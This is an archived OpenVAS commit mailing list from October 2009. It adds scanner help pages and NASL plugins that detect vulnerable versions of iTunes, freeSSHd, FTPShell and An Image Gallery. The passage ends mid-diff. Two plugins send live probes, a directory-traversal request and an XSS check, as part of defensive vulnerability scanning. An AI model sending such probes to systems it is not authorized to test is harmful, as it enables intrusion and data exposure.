From scm-commit at wald.intevation.org Thu Oct 1 00:40:34 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 1 Oct 2009 00:40:34 +0200 (CEST) Subject: [Openvas-commits] r5346 - in trunk/gsa: . src/html/src/help Message-ID: <20090930224034.B3D4985D918E@pyrosoma.intevation.org> Author: jan Date: 2009-10-01 00:40:33 +0200 (Thu, 01 Oct 2009) New Revision: 5346 Added: trunk/gsa/src/html/src/help/configure_targets.htm4 trunk/gsa/src/html/src/help/new_task.htm4 Modified: trunk/gsa/ChangeLog Log: * src/html/src/help/configure_targets.htm4, src/html/src/help/new_task.htm4: New. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2009-09-30 20:31:41 UTC (rev 5345) +++ trunk/gsa/ChangeLog 2009-09-30 22:40:33 UTC (rev 5346) @@ -1,3 +1,8 @@ +2009-10-01 Jan-Oliver Wagner + + * src/html/src/help/configure_targets.htm4, + src/html/src/help/new_task.htm4: New. + 2009-09-30 Jan-Oliver Wagner * src/html/src/img/start.png, src/html/src/img/refresh.png, Added: trunk/gsa/src/html/src/help/configure_targets.htm4 =================================================================== --- trunk/gsa/src/html/src/help/configure_targets.htm4 2009-09-30 20:31:41 UTC (rev 5345) +++ trunk/gsa/src/html/src/help/configure_targets.htm4 2009-09-30 22:40:33 UTC (rev 5346) @@ -0,0 +1,120 @@ +m4_define(`PAGE_TITLE', `Help: Configure Targets') +m4_include(`header.m4') + +
Help Contents
+
Jump to dialog

+ +

Configure Targets

+ +

+Any task is associated with +a target. +The configured targets will appear as selection +in the dialog for creating a new task. +

+ + +

New Target

+ +

+For creating a new target the dialog offers these entries. +Hit the button "Create Target" to submit the new target. +The list of targets will be updated. +

+ +

+Note on hosts: incorrect syntax for hosts will not be +warned but rather accepted. When applied for a scan, +only correct entries will be used and the rest will be ignored. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
MandatoryMax LengthSyntaxExample
Nameyes80AlphanumericStaging webservers
Hostsyes80Comma separated list of IPs and/or hostnames192.168.1.23, webserv1.mycompany.tld
Commentno40AlphanumericCovers both of our web staging systems
+ + +

Targets

+ +

+This table provides on overview on all configured +targets. The complete contents of the target entries +are shown (name, comment and hosts). +

+ + + + + + + + + + + + + + + + + + +
ColumnDescription
NameShows name of the target and, + if specificied, the comment in brackets below + the name.
HostsThe comma separated list of target hosts, specified + either via hostname or IP.
IPsThe total number of IPs that results from the + hosts specification.
+ + +

Actions

+ +

+For targets only one action is available: to delete an +entry. Editing a target is not foreseen. +You may copy the contents from the list to the above +shown "New Target" dialog and create a new target from this +with a different name. +

+ +

Delete Target

+ +

+Pressing the delete icon +Delete +will immedialy remove the entry and update the list. +

+ +

+Note that if a target is associated with at least one task, it is not possible +to delete it. In this case the button is greyed +out Delete. +

+ +m4_include(`footer.m4') Added: trunk/gsa/src/html/src/help/new_task.htm4 =================================================================== --- trunk/gsa/src/html/src/help/new_task.htm4 2009-09-30 20:31:41 UTC (rev 5345) +++ trunk/gsa/src/html/src/help/new_task.htm4 2009-09-30 22:40:33 UTC (rev 5346) @@ -0,0 +1,55 @@ +m4_define(`PAGE_TITLE', `Help: New task') +m4_include(`header.m4') + +
Help Contents
+
Jump to dialog

+ +

New task

+ +

+For creating a new task +you have to provide the following elements: +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
MandatoryMax LengthSyntaxExample
Task Nameyes80AlphanumericAll Windows desktops in-depth
Scan Typeyes---One of the + configured scan configs. + Full and fast
Scan Targetsyes---One of the + configured targets.The Windows Desktops
+ +

+Pressing button "Create Task" will add a new entry to the list +of tasks and return to the Tasks +overview. +

+ +m4_include(`footer.m4') From scm-commit at wald.intevation.org Thu Oct 1 00:43:43 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 1 Oct 2009 00:43:43 +0200 (CEST) Subject: [Openvas-commits] r5347 - in trunk/gsa: . src/html/src/img Message-ID: <20090930224343.24D2E85D9F42@pyrosoma.intevation.org> Author: jan Date: 2009-10-01 00:43:42 +0200 (Thu, 01 Oct 2009) New Revision: 5347 Added: trunk/gsa/src/html/src/img/new.png Modified: trunk/gsa/ChangeLog Log: * src/html/src/img/new.png: New. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2009-09-30 22:40:33 UTC (rev 5346) +++ trunk/gsa/ChangeLog 2009-09-30 22:43:42 UTC (rev 5347) @@ -1,5 +1,9 @@ 2009-10-01 Jan-Oliver Wagner + * src/html/src/img/new.png: New. + +2009-10-01 Jan-Oliver Wagner + * src/html/src/help/configure_targets.htm4, src/html/src/help/new_task.htm4: New. Added: trunk/gsa/src/html/src/img/new.png =================================================================== (Binary files differ) Property changes on: trunk/gsa/src/html/src/img/new.png ___________________________________________________________________ Name: svn:mime-type + application/octet-stream From scm-commit at wald.intevation.org Thu Oct 1 12:15:32 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 1 Oct 2009 12:15:32 +0200 (CEST) Subject: [Openvas-commits] r5348 - in trunk/openvas-plugins: . scripts Message-ID: <20091001101532.81A21865F480@pyrosoma.intevation.org> Author: chandra Date: 2009-10-01 12:15:29 +0200 (Thu, 01 Oct 2009) New Revision: 5348 Added: trunk/openvas-plugins/scripts/gb_apple_itunes_pls_file_bof_vuln_oct09.nasl trunk/openvas-plugins/scripts/secpod_an_image_gallery_dir_trav_vuln.nasl trunk/openvas-plugins/scripts/secpod_an_image_gallery_xss_vuln.nasl trunk/openvas-plugins/scripts/secpod_freesshd_detect.nasl trunk/openvas-plugins/scripts/secpod_freesshd_pre_auth_dos_vuln.nasl trunk/openvas-plugins/scripts/secpod_ftpshell_client_detect.nasl trunk/openvas-plugins/scripts/secpod_ftpshell_client_pasv_bof_vuln.nasl Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/cve_current.txt Log: Added new plugins Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-09-30 22:43:42 UTC (rev 5347) +++ trunk/openvas-plugins/ChangeLog 2009-10-01 10:15:29 UTC (rev 5348) @@ -1,3 +1,14 @@ +2009-10-01 Chandrashekhar B + + * scripts/secpod_an_image_gallery_xss_vuln.nasl, + scripts/secpod_ftpshell_client_detect.nasl, + scripts/secpod_freesshd_pre_auth_dos_vuln.nasl, + scripts/secpod_ftpshell_client_pasv_bof_vuln.nasl, + scripts/secpod_freesshd_detect.nasl, + scripts/secpod_an_image_gallery_dir_trav_vuln.nasl, + scripts/gb_apple_itunes_pls_file_bof_vuln_oct09.nasl: + Added new plugins. + 2009-09-29 Thomas Reinke * scripts/gb_apache_tomcat_xss_vuln.nasl: Modified: trunk/openvas-plugins/cve_current.txt =================================================================== --- trunk/openvas-plugins/cve_current.txt 2009-09-30 22:43:42 UTC (rev 5347) +++ trunk/openvas-plugins/cve_current.txt 2009-10-01 10:15:29 UTC (rev 5348) @@ -74,11 +74,18 @@ CVE-2009-3327 SecPod CVE-2009-3330 SecPod CVE-2009-3369 SecPod -CVE-2009-2817 SecPod -CVE-2009-3366 SecPod -CVE-2009-3367 Secpod -CVE-2009-3364 SecPod -CVE-2009-3340 SecPod +CVE-2009-2817 SecPod svn L +CVE-2009-3366 SecPod svn R +CVE-2009-3367 Secpod svn R +CVE-2009-3364 SecPod svn L +CVE-2009-3340 SecPod svn L CVE-2009-3431 SecPod CVE-2009-3444 SecPod +CVE-2009-3455 SecPod +CVE-2009-3454 SecPod +CVE-2009-3456 SecPod +CVE-2009-3471 SecPod +CVE-2009-3473 SecPod +CVE-2009-3472 SecPod +CVE-2009-3478 SecPod Added: trunk/openvas-plugins/scripts/gb_apple_itunes_pls_file_bof_vuln_oct09.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_apple_itunes_pls_file_bof_vuln_oct09.nasl 2009-09-30 22:43:42 UTC (rev 5347) +++ trunk/openvas-plugins/scripts/gb_apple_itunes_pls_file_bof_vuln_oct09.nasl 2009-10-01 10:15:29 UTC (rev 5348) @@ -0,0 +1,86 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_apple_itunes_pls_file_bof_vuln_oct09.nasl 5062 2009-10-01 20:13:12Z oct $ +# +# Apple iTunes '.pls' Files Buffer Overflow Vulnerability +# +# Authors: +# Sharath S +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801105); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-2817"); + script_bugtraq_id(36478); + script_name("Apple iTunes '.pls' Files Buffer Overflow Vulnerability"); + desc = " + Overview: This host has Apple iTunes installed, which is prone to Buffer + Overflow vulnerability. + + Vulnerability Insight: + The flaw exists in the handling of specially crafted '.pls' files. It fails + to bounds-check user-supplied data before copying it into an insufficiently + sized buffer. + + Impact: + Successful exploitation will let the attacker to execute arbitrary code within + the context of the affected application, failed exploit attempts will result in + a denial of service condition. + + Impact Level: Application + + Affected Software/OS: + Apple iTunes version prior to 9.0.1 on Windows. + + Fix: Upgrade to Apple iTunes Version 9.0.1 + http://www.apple.com/itunes/download + + References: + http://support.apple.com/kb/HT3884 + http://lists.apple.com/archives/security-announce/2009/Sep/msg00006.html + + CVSS Score: + CVSS Base Score : 9.3 (AV:N/AC:M/Au:NR/C:C/I:C/A:C) + CVSS Temporal Score : 6.9 + Risk factor: High"; + + script_description(desc); + script_summary("Check for the version of Apple iTunes"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("Buffer overflow"); + script_dependencies("secpod_apple_itunes_detection_win_900123.nasl"); + script_require_keys("iTunes/Win/Ver"); + exit(0); +} + + +include("version_func.inc"); + +itunesVer = get_kb_item("iTunes/Win/Ver"); +if(!itunesVer){ + exit(0); +} + +# Check for iTunes version prior to 9.0.1 (9.0.1.8) +if(version_is_less(version:itunesVer, test_version:"9.0.1.8")){ + security_hole(0); +} Added: trunk/openvas-plugins/scripts/secpod_an_image_gallery_dir_trav_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_an_image_gallery_dir_trav_vuln.nasl 2009-09-30 22:43:42 UTC (rev 5347) +++ trunk/openvas-plugins/scripts/secpod_an_image_gallery_dir_trav_vuln.nasl 2009-10-01 10:15:29 UTC (rev 5348) @@ -0,0 +1,109 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: secpod_an_image_gallery_dir_trav_vuln.nasl 5060 2009-09-30 20:38:56Z sep $ +# +# An Image Gallery Directory Traversal Vulnerability +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2009 SecPod, http://www.secpod.com +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(901037); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3366"); + script_name("An Image Gallery Directory Traversal Vulnerability"); + desc = " + Overview: This host is running An Image Gallery and is prone to Directory + Traversal vulnerability. + + Vulnerability Insight: + Input passed to the 'path' parameter in 'navigation.php' is not properly + verified before being used to generate and display folder contents. + + Impact: + Successful exploitation will let the attacker to gain information about + directory and file locations. + + Impact Level: System/Application. + + Affected Software/OS: + An Image Gallery version 1.0 and prior. + + Fix: + No solution or patch is available as on 30th September, 2009. Information + regarding this issue will be updated once the solution details are available. + For updates refer, http://plohni.com/wb/content/php/Free_scripts.php + + References: + http://secunia.com/advisories/36680 + http://www.milw0rm.com/exploits/9636 + http://xforce.iss.net/xforce/xfdb/53148 + + CVSS Score: + CVSS Base Score : 5.0 (AV:N/AC:L/Au:NR/C:P/I:N/A:N) + CVSS Temporal Score : 4.5 + Risk factor: Medium"; + + script_description(desc); + script_summary("Check for the version of An Image Gallery"); + script_category(ACT_MIXED_ATTACK); + script_copyright("Copyright (C) 2009 SecPod"); + script_family("Web application abuses"); + script_dependencies("find_service.nes"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); +include("version_func.inc"); + +anPort = get_http_port(default:80); +if(!anPort){ + anPort = 80; +} + +if(!get_port_state(anPort)){ + exit(0); +} + +if(safe_checks()){ + exit(0); +} + +foreach dir (make_list("/", "/image_gallery", "/gallery", "/album", cgi_dirs())) +{ + sndReq = http_get(item:string(dir + "/main.php"), port:anPort); + rcvRes = http_send_recv(port:anPort, data:sndReq); + + if("An image gallery" >< rcvRes) + { + request = http_get(item:dir + "/navigation.php?path=../../../../../../../", + port:anPort); + response = http_send_recv(port:anPort, data:request); + + if(("WINDOWS" >< response) || ("root" >< response)) + { + security_warning(anPort); + exit(0); + } + } +} Property changes on: trunk/openvas-plugins/scripts/secpod_an_image_gallery_dir_trav_vuln.nasl ___________________________________________________________________ Name: svn:executable + * Added: trunk/openvas-plugins/scripts/secpod_an_image_gallery_xss_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_an_image_gallery_xss_vuln.nasl 2009-09-30 22:43:42 UTC (rev 5347) +++ trunk/openvas-plugins/scripts/secpod_an_image_gallery_xss_vuln.nasl 2009-10-01 10:15:29 UTC (rev 5348) @@ -0,0 +1,108 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: secpod_an_image_gallery_xss_vuln.nasl 5060 2009-09-30 15:11:27Z sep $ +# +# An Image Gallery Multiple Cross-Site Scripting Vulnerability +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2009 SecPod, http://www.secpod.com +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(901038); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3367"); + script_name("An Image Gallery Multiple Cross-Site Scripting Vulnerability"); + desc = " + Overview: The host is running An Image Gallery and is prone to Multiple + Cross-Site Scripting Vulnerability. + + Vulnerability Insight: + Input passed to the 'path' parameter in 'index.php' and 'main.php' and to + the 'show' parameter in 'main.php' is not properly sanitised before being + returned to the user. + + Impact: + Successful exploitation could allow remote attackers to execute arbitrary + HTML and script code in a user's browser session in the context of an + affected site. + + Impact Level:System/Application. + + Affected Software/OS: + An Image Gallery version 1.0 and prior. + + Fix: No solution or patch is available as on 30th September, 2009. Information + regarding this issue will be updated once the solution details are available. + For updates refer, http://plohni.com/wb/content/php/Free_scripts.php + + References: + http://secunia.com/advisories/36680 + + CVSS Score: + CVSS Base Score : 4.3 (AV:N/AC:M/Au:NR/C:N/I:P/A:N) + CVSS Temporal Score : 3.9 + Risk factor: Medium"; + + script_description(desc); + script_summary("Check for the version of An Image Gallery"); + script_category(ACT_MIXED_ATTACK); + script_copyright("Copyright (C) 2009 SecPod"); + script_family("Web application abuses"); + script_dependencies("find_service.nes"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); +include("version_func.inc"); + +anPort = get_http_port(default:80); +if(!anPort){ + anPort = 80; +} + +if(!get_port_state(anPort)){ + exit(0); +} + +if(safe_checks()){ + exit(0); +} + +foreach dir (make_list("/", "/image_gallery", "/gallery", "/album", cgi_dirs())) +{ + sndReq = http_get(item:string(dir + "/main.php"), port:anPort); + rcvRes = http_send_recv(port:anPort, data:sndReq); + + if("An image gallery" >< rcvRes) + { + request = http_get(item:dir + "/main.php?show=",port:anPort); + response = http_send_recv(port:anPort, data:request); + + if("Exploit-XSS" >< response) + { + security_warning(anPort); + exit(0); + } + } +} Added: trunk/openvas-plugins/scripts/secpod_freesshd_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_freesshd_detect.nasl 2009-09-30 22:43:42 UTC (rev 5347) +++ trunk/openvas-plugins/scripts/secpod_freesshd_detect.nasl 2009-10-01 10:15:29 UTC (rev 5348) @@ -0,0 +1,70 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: secpod_freesshd_detect.nasl 5058 2009-09-30 13:14:28Z sep $ +# +# freeSSHd Version Detection +# +# Authors: +# Nikita MR +# +# Copyright: +# Copyright (c) 2009 SecPod, http://www.secpod.com +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(900959); + script_version("$Revision: 1.0 $"); + script_name("freeSSHd Version Detection"); + desc = " + Overview: This script detects the installed version of freeSSHd and sets + the reuslt in KB. + + Risk Factor: Informational"; + + script_description(desc); + script_summary("Set KB for the version of freeSSHd"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 SecPod"); + script_family("Service detection"); + script_dependencies("secpod_reg_enum.nasl"); + script_require_keys("SMB/WindowsVersion"); + script_require_ports(139, 445); + exit(0); +} + + +include("smb_nt.inc"); +include("secpod_smb_func.inc"); + +if(!get_kb_item("SMB/WindowsVersion")){ + exit(0); +} + +key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\"; +foreach item (registry_enum_keys(key:key)) +{ + sshdName = registry_get_sz(key:key + item, item:"DisplayName"); + + if("freeSSHd" >< sshdName) + { + sshdVer = eregmatch(pattern:"freeSSHd ([0-9.]+)", string:sshdName); + + if(!isnull(sshdVer[1])){ + set_kb_item(name:"freeSSHd/Ver", value:sshdVer[1]); + } + } +} Property changes on: trunk/openvas-plugins/scripts/secpod_freesshd_detect.nasl ___________________________________________________________________ Name: svn:executable + * Added: trunk/openvas-plugins/scripts/secpod_freesshd_pre_auth_dos_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_freesshd_pre_auth_dos_vuln.nasl 2009-09-30 22:43:42 UTC (rev 5347) +++ trunk/openvas-plugins/scripts/secpod_freesshd_pre_auth_dos_vuln.nasl 2009-10-01 10:15:29 UTC (rev 5348) @@ -0,0 +1,86 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: secpod_freesshd_pre_auth_dos_vuln.nasl 5058 2009-09-30 15:01:39Z sep $ +# +# freeSSHd Pre-Authentication Error Remote DoS Vulnerability +# +# Authors: +# Nikita MR +# +# Copyright: +# Copyright (c) 2009 SecPod, http://www.secpod.com +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +################################################################################ + +if(description) +{ + script_id(900960); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3340"); + script_bugtraq_id(36235); + script_name("freeSSHd Pre-Authentication Error Remote DoS Vulnerability"); + desc = " + Overview: This host has freeSSHd installed and is prone to Denial of Service + vulnerability. + + Vulnerability Insight: + The flaw is caused due to an unspecified pre-authentication error. + + Impact: + Successful attack could allow attackers to crash application to cause + denial of service. + + Impact Level: Application + + Affected Software/OS: + freeSSHd version 1.2.4 and prior. + + Fix: No solution or patch is available as on 30th September, 2009. Information + regarding this issue will be updated once the solution details are available. + For updates refer, http://www.freesshd.com/ + + References: + http://intevydis.com/vd-list.shtml + http://www.intevydis.com/blog/?p=57 + http://secunia.com/advisories/36506 + http://securitytracker.com/alerts/2009/Sep/1022811.html + + CVSS Score: + CVSS Base Score : 5.0 (AV:N/AC:L/Au:NR/C:N/I:N/A:P) + CVSS Temporal Score : 4.5 + Risk factor: Medium"; + + script_description(desc); + script_summary("Check for the version of freeSSHd"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 SecPod"); + script_family("Denial of Service"); + script_dependencies("secpod_freesshd_detect.nasl"); + script_require_keys("freeSSHd/Ver"); + script_require_ports("Services/ssh", 22); + exit(0); +} + + +include("version_func.inc"); + +sshdVer = get_kb_item("freeSSHd/Ver"); +if(sshdVer) +{ + # Grep for freeSSHd version 1.2.4 and prior + if(version_is_less_equal(version:sshdVer, test_version:"1.2.4")){ + security_warning(sshdPort); + } +} Property changes on: trunk/openvas-plugins/scripts/secpod_freesshd_pre_auth_dos_vuln.nasl ___________________________________________________________________ Name: svn:executable + * Added: trunk/openvas-plugins/scripts/secpod_ftpshell_client_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_ftpshell_client_detect.nasl 2009-09-30 22:43:42 UTC (rev 5347) +++ trunk/openvas-plugins/scripts/secpod_ftpshell_client_detect.nasl 2009-10-01 10:15:29 UTC (rev 5348) @@ -0,0 +1,97 @@ +############################################################################## +# OpenVAS Vulnerability Test +# $Id: secpod_ftpshell_client_detect.nasl 5061 2009-09-30 16:54:10Z sep $ +# +# FTPShell Client Version Detection +# +# Authors: +# Nikita MR +# +# Copyright: +# Copyright (c) 2009 SecPod, http://www.secpod.com +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(900961); + script_version("$Revision: 1.0$"); + script_name("FTPShell Client Version Detection"); + desc = " + Overview: This script detects the installed version of FTPShell Client + and sets the result in KB. + + Risk factor: Informational"; + + script_description(desc); + script_summary("Set the KB for the version of FTPShell Client"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 SecPod"); + script_family("Service detection"); + script_dependencies("secpod_reg_enum.nasl"); + script_require_keys("SMB/WindowsVersion"); + script_require_ports(139, 445); + exit(0); +} + + +include("smb_nt.inc"); +include("secpod_smb_func.inc"); + +if(!get_kb_item("SMB/WindowsVersion")){ + exit(0); +} + +key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\"; + +foreach item (registry_enum_keys(key:key)) +{ + fclntName = registry_get_sz(key:key + item, item:"DisplayName"); + + if("FTPShell Client" >< fclntName) + { + fclntPath = registry_get_sz(key:key + item, item:"UninstallString"); + fclntPath = ereg_replace(pattern:'\"(.*)\"',replace:"\1",string:fclntPath); + fclntPath = fclntPath - 'unins000.exe' + 'readme.txt'; + + if(isnull(fclntPath)){ + exit(0); + } + + share = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:fclntPath); + file = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", string:fclntPath); + readmeText = read_file(share:share, file:file, offset:0, count:500); + + if(readmeText) + { + shellVer = eregmatch(pattern:"Version +: ([0-9.]+).?([a-zA-Z]+.?[0-9]+)?", + string:readmeText); + if(!isnull(shellVer[1])) + { + if(!isnull(shellVer[2])) + { + shellVer[2] = ereg_replace(pattern:" ",string:shellVer[2],replace:""); + shellVer = shellVer[1] + "." + shellVer[2]; + } + else + shellVer = shellVer[1]; + + if(shellVer){ + set_kb_item(name:"FTPShell/Client/Ver", value:shellVer); + } + } + } + } +} Property changes on: trunk/openvas-plugins/scripts/secpod_ftpshell_client_detect.nasl ___________________________________________________________________ Name: svn:executable + * Added: trunk/openvas-plugins/scripts/secpod_ftpshell_client_pasv_bof_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_ftpshell_client_pasv_bof_vuln.nasl 2009-09-30 22:43:42 UTC (rev 5347) +++ trunk/openvas-plugins/scripts/secpod_ftpshell_client_pasv_bof_vuln.nasl 2009-10-01 10:15:29 UTC (rev 5348) @@ -0,0 +1,83 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: secpod_ftpshell_client_pasv_bof_vuln.nasl 5061 2009-09-30 16:18:42Z sep $ +# +# FTPShell Client PASV Command Buffer Overflow Vulnerability +# +# Authors: +# Nikita MR +# +# Copyright: +# Copyright (c) 2009 SecPod, http://www.secpod.com +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(900962); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3364"); + script_bugtraq_id(36327); + script_name("FTPShell Client PASV Command Buffer Overflow Vulnerability"); + desc = " + Overview: This host is running FTPShell Client and is prone to Buffer + Overflow vulnerability. + + Vulnerability Insight: + A buffer overflow error occurs due to improper bounds checking when handling + overly long PASV messages sent by the server. + + Impact: + Successful exploitation will let the user execute arbitrary code and crash + the application to cause denial of service. + + Affected Software/OS: + FTPShell Client 4.1 RC2 and prior. + + Fix: No solution or patch is available as on 30th September, 2009. Information + regarding this issue will be updated once the solution details are available. + For updates refer, http://www.ftpshell.com/ + + References: + http://secunia.com/advisories/36628 + http://www.milw0rm.com/exploits/9613 + http://xforce.iss.net/xforce/xfdb/53126 + + CVSS Score: + CVSS Base Score : 9.3 (AV:N/AC:M/Au:NR/C:C/I:C/A:C) + CVSS Temporal Score : 8.4 + Risk factor: Critical"; + + script_description(desc); + script_summary("Check for the version of FTPShell Client"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 SecPod"); + script_family("Buffer overflow"); + script_dependencies("secpod_ftpshell_client_detect.nasl"); + script_require_keys("FTPShell/Client/Ver"); + exit(0); +} + + +include("version_func.inc"); + +shellVer = get_kb_item("FTPShell/Client/Ver"); +if(isnull(shellVer)){ + exit(0); +} + +if(version_is_less_equal(version:shellVer, test_version:"4.1.RC2")){ + security_hole(0); +} Property changes on: trunk/openvas-plugins/scripts/secpod_ftpshell_client_pasv_bof_vuln.nasl ___________________________________________________________________ Name: svn:executable + * From scm-commit at wald.intevation.org Thu Oct 1 18:57:34 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 1 Oct 2009 18:57:34 +0200 (CEST) Subject: [Openvas-commits] r5349 - in trunk/openvas-plugins: . scripts Message-ID: <20091001165734.70DD5852AD1D@pyrosoma.intevation.org> Author: mime Date: 2009-10-01 18:57:31 +0200 (Thu, 01 Oct 2009) New Revision: 5349 Added: trunk/openvas-plugins/scripts/BigAnt_36407.nasl trunk/openvas-plugins/scripts/BigAnt_detect.nasl trunk/openvas-plugins/scripts/ms_smb2_highid.nasl trunk/openvas-plugins/scripts/nginx_36384.nasl trunk/openvas-plugins/scripts/nginx_36438.nasl trunk/openvas-plugins/scripts/nginx_36490.nasl trunk/openvas-plugins/scripts/nginx_detect.nasl trunk/openvas-plugins/scripts/php_restriction_bypass.nasl trunk/openvas-plugins/scripts/postgreSQL_multiple_security_vulnerabilities.nasl trunk/openvas-plugins/scripts/warftpd_20944.nasl Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/cve_current.txt Log: Added new plugins Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-10-01 10:15:29 UTC (rev 5348) +++ trunk/openvas-plugins/ChangeLog 2009-10-01 16:57:31 UTC (rev 5349) @@ -1,3 +1,17 @@ +2009-10-01 Michael Meyer + + * scripts/BigAnt_36407.nasl, + scripts/warftpd_20944.nasl, + scripts/nginx_36384.nasl, + scripts/postgreSQL_multiple_security_vulnerabilities.nasl, + scripts/nginx_detect.nasl, + scripts/nginx_36438.nasl, + scripts/ms_smb2_highid.nasl, + scripts/BigAnt_detect.nasl, + scripts/php_restriction_bypass.nasl, + scripts/nginx_36490.nasl: + Added new plugins. + 2009-10-01 Chandrashekhar B * scripts/secpod_an_image_gallery_xss_vuln.nasl, Modified: trunk/openvas-plugins/cve_current.txt =================================================================== --- trunk/openvas-plugins/cve_current.txt 2009-10-01 10:15:29 UTC (rev 5348) +++ trunk/openvas-plugins/cve_current.txt 